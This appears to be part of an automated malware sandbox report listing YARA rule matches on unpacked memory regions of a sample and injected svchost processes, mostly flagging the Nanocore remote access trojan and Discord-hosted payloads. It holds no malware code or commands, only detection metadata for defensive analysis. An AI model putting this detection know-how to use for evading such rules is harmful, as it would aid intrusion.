    Source: 9.2.p9Ts9VV2NZ.exe.7340000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7340000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.7350000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7350000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.7360000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7360000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 8.0.p9Ts9VV2NZ.exe.70000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 9.2.p9Ts9VV2NZ.exe.4af60a1.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.4af60a1.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 7.2.p9Ts9VV2NZ.exe.2d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 9.2.p9Ts9VV2NZ.exe.49deafd.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.73d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.73d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.4c56c41.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.7394c9f.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7394c9f.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 13.2.svchost.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 13.0.svchost.exe.3d8ed58.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 13.0.svchost.exe.3d8ed58.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 13.0.svchost.exe.3d8ed58.16.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.c00000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 13.0.svchost.exe.3d8ed58.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 13.0.svchost.exe.3d8ed58.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 13.0.svchost.exe.3d8ed58.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.7360000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7360000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.739e8a4.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.739e8a4.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.7180000.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7180000.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 15.0.svchost.exe.50afd10.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.0.svchost.exe.50afd10.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 15.0.svchost.exe.50afd10.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.408b11e.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.408b11e.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.408b11e.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.7390000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7390000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.306c9d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.306c9d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.7310000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7310000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.7390000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7390000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.4bcc923.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.4bcc923.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.49d28c9.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.30d111c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.30d111c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.4c4d7e2.20.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.7310000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7310000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 15.0.svchost.exe.50afd10.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.0.svchost.exe.50afd10.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 15.0.svchost.exe.50afd10.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.7340000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7340000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.0.p9Ts9VV2NZ.exe.c00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 9.2.p9Ts9VV2NZ.exe.49deafd.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.49deafd.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.4bbe4f3.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.4bbe4f3.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 15.0.svchost.exe.50afd10.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.0.svchost.exe.50afd10.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 15.0.svchost.exe.50afd10.16.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.7320000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7320000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 13.0.svchost.exe.1d0000.12.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
